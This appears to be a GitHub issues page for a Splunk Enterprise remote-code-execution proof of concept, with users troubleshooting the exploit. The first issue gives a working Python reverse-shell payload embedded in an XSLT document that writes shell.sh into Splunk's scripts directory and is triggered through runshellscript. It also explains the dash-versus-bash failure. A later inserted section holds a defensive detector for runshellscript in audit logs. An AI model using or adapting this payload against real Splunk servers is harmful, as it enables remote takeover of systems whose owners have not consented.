splunk-rce-poc's Issues
Reverse shell triggering error - Dash vs Bash
I was testing the exploit script on our non-docker Splunk Enterprise 9.0.4 test environment and had an issue with triggering the uploaded reverse shell. It was interesting because the shell.sh was uploaded and the contents were correct. The exploit script said it was triggered and shell should be achieved. I could also run the same command on the Splunk VM and connect to nc. So the uploaded reverse shell was fine. But when the exploit script triggered the reverse shell via |runshellscript "shell.sh" "" "" "" "" "" "" "" "<jsid>", I would get an error.
When I tinkered with the uploaded shell and triggered the runshellscript from Splunk web interface, I noticed a change in the error code. That led me to explore other reverse shell options. One of the simple fixes was to replace the original reverse shell with a python reverse shell in the exploit script. For example:
<exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
<xsl:text>export RHOST="{ip}";export RPORT={port};python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</xsl:text>
</exsl:document>
The python reverse shell works fine. But still I was confused why the original sh -i ... reverse shell was failing when triggered via the runshellscript.
We looked over it with my colleague Kert and he figured out what our issue was. Splunk's runshellscript executes the shell.sh with /bin/sh. But /bin/sh in itself is a symlink. In docker versions of Splunk, it points to /bin/bash and the original exploit code works like a charm. In our environment /bin/sh was pointing to /bin/dash. Dash could not do the original reverse shell, hence was failing.
So if someone is having a similar issue, replace the original reverse shell of the exploit script with something else like python based (see above). Or, point sh to bash instead of dash with:
ln -s /bin/bash /bin/sh -f
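Added example, not part of the issue above or of the PoC repository: a defender-side check that scans audit-style log lines for searches invoking runshellscript, the trigger described in the issue, and extracts the user, the script name and the final argument. The log lines are constructed and their key=value layout is an assumption; `find_runshellscript` and the finding fields are hypothetical names.

```python
import re

# Constructed sample lines. The key=value layout is an assumption modelled on
# Splunk's audit trail; adjust the regexes to the log source you actually have.
SAMPLE_AUDIT = [
    "Audit:[timestamp=01-01-2024 10:00:01.000, user=analyst, action=search, "
    "info=granted, search_id='1704103201.10', search='search index=main error']",
    "Audit:[timestamp=01-01-2024 10:05:42.000, user=lowpriv, action=search, "
    "info=granted, search_id='1704103542.11', "
    "search='|runshellscript \"shell.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"1704103500.9\"']",
    "Audit:[timestamp=01-01-2024 10:06:00.000, user=admin, action=login attempt, "
    "info=succeeded]",
]

USER_RE = re.compile(r"\buser=([^,\]]+)")
SEARCH_RE = re.compile(r"\bsearch='(.*?)'(?=,|\])")       # quoted search string
RUN_RE = re.compile(r"\|\s*runshellscript\b(.*)", re.IGNORECASE | re.DOTALL)
ARG_RE = re.compile(r'"([^"]*)"')                         # each quoted argument


def find_runshellscript(lines):
    """Return one finding per audit line whose search invokes runshellscript."""
    findings = []
    for line in lines:
        search = SEARCH_RE.search(line)
        if not search:
            continue  # not a search event
        run = RUN_RE.search(search.group(1))
        if not run:
            continue  # ordinary search
        args = ARG_RE.findall(run.group(1))
        user = USER_RE.search(line)
        findings.append({
            "user": user.group(1).strip() if user else "unknown",
            "script": args[0] if args else None,          # first argument
            "sid": args[-1] if len(args) > 1 else None,   # last argument
            "search": search.group(1),
        })
    return findings


if __name__ == "__main__":
    for hit in find_runshellscript(SAMPLE_AUDIT):
        print(f"{hit['user']} ran runshellscript script={hit['script']} sid={hit['sid']}")
```
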
Noticed issue on file upload
Exploit will not work at first.
I uploaded a file manually and got a message text.
Then I changed the exploit code and hardcoded a message text.
Then getting job is fine.
Turning proxy on (that part was sweet)
Fire exploit, see this on file upload stage
idk how to fix it, probably headers are wrong.
Thank you for a great research,
BR
Creating job Failed. Can't seem to get reverse shell back.
So I have tried installing Splunk 9.0.1 and also 9.1.1 as stated in previous issue by you and also on your blog. I have tried both ways (installing it on Ubuntu and via docker too). I am getting the same error. I am attaching a screenshot below. The upper one is on the on-prem version and the one below was tried on docker as stated by you in issue 1